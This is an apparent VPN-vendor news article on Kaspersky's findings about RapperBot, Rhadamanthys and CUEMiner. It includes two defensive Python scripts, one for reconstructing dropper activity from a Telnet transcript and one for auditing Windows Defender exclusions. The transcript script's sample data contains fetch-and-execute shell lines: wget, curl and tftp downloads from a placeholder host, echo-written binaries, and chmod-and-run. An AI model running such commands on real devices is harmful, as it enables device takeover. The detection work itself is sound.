RapperBot, Rhadamanthys and CUEMiner

‘RapperBot, Rhadamanthys and CUEMiner’: Look Out for Open Source Uncommon Infection Methods 

PureVPN News

Kaspersky has documented several uncommon infection methods that could be combined with more advanced tactics in future campaigns to do far more damage. Malvertising and malicious downloads are the key elements.

RapperBot: the architecture identifier

RapperBot is a Mirai-based worm that infects IoT devices in order to launch DDoS attacks against non-HTTP targets, but it uses its own C2 command protocol rather than Mirai's. It was first discovered in June 2022, when it targeted SSH services; the latest version has dropped the SSH functionality and focuses solely on Telnet. It has been considerably successful: Kaspersky counted 112k infection attempts from more than 2k unique IP addresses in Q4 2022.

RapperBot's "smart" approach to brute-force attacks sets it apart from other worms. Rather than working through a long credential list, it inspects the login prompt and picks credentials appropriate to the device the prompt reveals, which sharply reduces the time needed to brute-force a target.

Before infecting a device, RapperBot identifies its processor architecture so that it fetches a binary built for that platform. It downloads the malware with whichever tool is available on the device: wget, curl, tftp or ftpget. If all of these fail, the worm writes a small malware downloader onto the device with "echo" shell commands.
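The two behaviours described above (trying the download tools in turn, then falling back to writing bytes with echo) leave a recognisable trace in a Telnet honeypot or packet capture. The script below is an added example, not code from Kaspersky or from the RapperBot sample: it lists the downloader invocations in a session transcript, rebuilds any file written with `echo -ne '\xHH...' > path` redirections, and reads the ELF header of the result to see which architecture the dropper was built for. It assumes the echo fallback uses `\xHH` escapes redirected to a file, which is how Mirai-family droppers usually do it; the page does not state the exact mechanism. The session lines are constructed for the example and 203.0.113.10 is a documentation address.

```python
import re
import struct

# e_machine values from the ELF specification, limited to architectures
# commonly seen in IoT botnet payloads.
E_MACHINE = {
    0x03: "x86", 0x08: "MIPS", 0x14: "PowerPC", 0x28: "ARM",
    0x2A: "SuperH", 0x2B: "SPARC V9", 0x3E: "x86-64", 0xB7: "AArch64",
}

# Download tools the worm tries first (names as given on the page).
DOWNLOADERS = ("wget", "curl", "tftp", "ftpget")

# echo -e/-ne '<escaped bytes>' > path   (>> appends to an existing file)
ECHO_RE = re.compile(r"""echo\s+-(?:ne|en|e)\s+(['"])(.*?)\1\s*(>>?)\s*(\S+)""")


def decode_echo_arg(arg: str) -> bytes:
    """Turn the \\xHH and \\\\ escapes that `echo -e` understands into raw bytes."""
    out = bytearray()
    i = 0
    while i < len(arg):
        if arg.startswith("\\x", i):
            m = re.match(r"[0-9a-fA-F]{1,2}", arg[i + 2:i + 4])
            if m:
                out.append(int(m.group(), 16))
                i += 2 + len(m.group())
                continue
        if arg.startswith("\\\\", i):
            out.append(0x5C)
            i += 2
            continue
        out.extend(arg[i].encode("latin-1", "replace"))
        i += 1
    return bytes(out)


def download_attempts(session_lines):
    """Return (tool, command) for every downloader invocation in the session."""
    hits = []
    for line in session_lines:
        for tool in DOWNLOADERS:
            if re.search(rf"(?:^|[\s;|&])(?:\S*/)?{tool}\b", line):
                hits.append((tool, line.strip()))
    return hits


def reconstruct_uploads(session_lines):
    """Rebuild files that were written piecewise with echo redirections."""
    files = {}
    for line in session_lines:
        for _quote, arg, op, path in ECHO_RE.findall(line):
            data = decode_echo_arg(arg)
            files[path] = data if op == ">" else files.get(path, b"") + data
    return files


def elf_arch(data: bytes):
    """Read EI_CLASS, EI_DATA and e_machine from an ELF header, or None if not ELF."""
    if len(data) < 20 or data[:4] != b"\x7fELF":
        return None
    bits = {1: "32-bit", 2: "64-bit"}.get(data[4], "unknown-class")
    endian = {1: "little-endian", 2: "big-endian"}.get(data[5], "unknown-endian")
    fmt = "<H" if data[5] == 1 else ">H"
    (machine,) = struct.unpack(fmt, data[18:20])  # e_machine follows e_type at offset 16
    return f"{E_MACHINE.get(machine, hex(machine))} {bits} {endian}"


# Constructed Telnet session transcript (not a real capture).
SESSION = [
    "/bin/busybox wget http://203.0.113.10/bins/x.mips -O /tmp/.x; /bin/busybox tftp -g -r x.mips 203.0.113.10",
    "curl -o /tmp/.x http://203.0.113.10/bins/x.mips",
    "echo -ne '\\x7f\\x45\\x4c\\x46\\x01\\x02\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' > /tmp/.d",
    "echo -ne '\\x00\\x02\\x00\\x08\\x00\\x00\\x00\\x01' >> /tmp/.d",
    "chmod +x /tmp/.d; /tmp/.d",
]

if __name__ == "__main__":
    for tool, cmd in download_attempts(SESSION):
        print(f"download via {tool}: {cmd}")
    for path, data in reconstruct_uploads(SESSION).items():
        print(f"{path}: {len(data)} bytes, {elf_arch(data)}")
```

On the constructed session the script reports three download attempts (wget, tftp, curl) and a 24-byte file at /tmp/.d whose header identifies a 32-bit big-endian MIPS binary, the kind of evidence that tells a responder which device class the operator was targeting.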

Malvertising agent: Rhadamanthys

Rhadamanthys, a newly discovered information-stealing malware, was first advertised on a Russian cybercriminal forum in September 2022 as a MaaS platform. The author claimed that the malware:

  • is coded in C/C++, with the C2 coded in Golang;
  • can stealthily infect systems;
  • collects data on CPU type, screen resolution, supported wallets, and more;
  • can bypass EDR/AV;
  • uses encrypted communication with the C2.

Although the malware was advertised in September 2022, the first samples were not detected until the beginning of 2023. Rhadamanthys initially spread through phishing and spam but has recently been distributed through malvertising.

Malvertising places malicious advertisements on websites, in mobile apps, or in search engine results. Rhadamanthys leverages both search engine and website-based ad platforms. The ads promote legitimate applications but link to phishing sites, which serve fake installers that trick users into downloading and running the malware.

During its analysis of Rhadamanthys, Kaspersky found a strong link to the Hidden Bee miner: both use images to conceal the payload, have similar bootstrapping shellcode, use in-memory virtual file systems, and use Lua to load plugins and modules.

CUEMiner: Distributive malware

The CUEMiner downloader, written in .NET and wrapped in a C++-based dropper, connects to a set of URLs, which vary from sample to sample, to download the miner and its configuration. It also performs various checks to make sure it is running on a bare-metal system rather than a virtual machine. Once all checks pass, the malware:

  • Reconfigures Windows Defender to exclude the user profile path and the entire system drive from scanning.
  • Retrieves configuration details from a hardcoded URL and saves them in different locations (e.g., c:\logs.uce, %localappdata%\logs.uce).
  • Creates empty files and subdirectories in %ProgramData%\HostData to make the directory look harmless.
  • Downloads the miner and watcher.
  • Performs several other tasks, which are detailed in Kaspersky's confidential report.
  • The miner software is launched if it doesn’t detect any processes that consume significant system resources (e.g., games). When a resource-intensive process like a game is launched, the miner is stopped and only resumed when the process ends. This is done to remain undetected on the system for an extended period.
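The first step in that list, excluding the user profile and the whole system drive from Defender scanning, is the one a defender can most easily audit, because an exclusion that broad has no legitimate use on a workstation. The script below is an added example, not code from Kaspersky or from CUEMiner: given the configured exclusion paths, as `Get-MpPreference` reports in `ExclusionPath` or as the `HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths` key lists them, it expands environment variables and flags exclusions that cover an entire drive, a whole user profile, or anything under ProgramData (the staging directory named above). The exclusion list and environment values are constructed for the example.

```python
import re

# Expansion map standing in for the victim's environment (constructed values).
SAMPLE_ENV = {
    "USERPROFILE": r"C:\Users\alice",
    "LOCALAPPDATA": r"C:\Users\alice\AppData\Local",
    "APPDATA": r"C:\Users\alice\AppData\Roaming",
    "PROGRAMDATA": r"C:\ProgramData",
    "SYSTEMDRIVE": "C:",
}

# Constructed exclusion list in the form Defender's ExclusionPath returns it.
SAMPLE_EXCLUSIONS = [
    "C:\\",
    "%USERPROFILE%",
    r"C:\ProgramData\HostData",
    r"C:\Program Files\Vendor\app.exe",
]


def expand(path: str, env: dict) -> str:
    """Expand %VAR% references the way the Windows shell would."""
    return re.sub(r"%([^%]+)%", lambda m: env.get(m.group(1).upper(), m.group(0)), path)


def normalize(path: str, env: dict) -> str:
    """Lower-case, backslash-only, no trailing separator, so paths compare cleanly."""
    return expand(path, env).strip().replace("/", "\\").lower().rstrip("\\")


def classify_exclusion(path: str, env: dict):
    """Return why an exclusion is dangerously broad, or None if it looks scoped."""
    p = normalize(path, env)
    if re.fullmatch(r"[a-z]:", p):
        return "entire drive"
    profile_roots = {normalize(env[v], env)
                     for v in ("USERPROFILE", "LOCALAPPDATA", "APPDATA") if v in env}
    if p in profile_roots or re.fullmatch(r"[a-z]:\\users\\[^\\]+", p):
        return "whole user profile"
    programdata = normalize(env.get("PROGRAMDATA", r"C:\ProgramData"), env)
    if p == programdata or p.startswith(programdata + "\\"):
        return "under ProgramData"
    return None


def audit_exclusions(paths, env):
    """Return (path, reason) for every exclusion that deserves a second look."""
    flagged = []
    for path in paths:
        reason = classify_exclusion(path, env)
        if reason:
            flagged.append((path, reason))
    return flagged


if __name__ == "__main__":
    for path, reason in audit_exclusions(SAMPLE_EXCLUSIONS, SAMPLE_ENV):
        print(f"{path!r}: {reason}")
```

On a live host the same list can be pulled with `Get-MpPreference | Select-Object -ExpandProperty ExclusionPath` and fed to `audit_exclusions`; Defender also records each configuration change as event ID 5007 in the Microsoft-Windows-Windows Defender/Operational log, so the moment the exclusion was added can be matched against the dropper's execution time.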


Concluding thoughts

Less experienced hackers often resort to open-source malware because they lack the expertise and contacts to run large-scale campaigns. As they progress in their criminal careers and gain knowledge, including programming and security skills, they often reuse and improve key components of open-source malware code.

Code recycling and rebranding are also common among cybercriminals. Many ransomware variants have changed names over time while keeping largely the same code base; in other cases, parts of the code are repurposed in new campaigns.
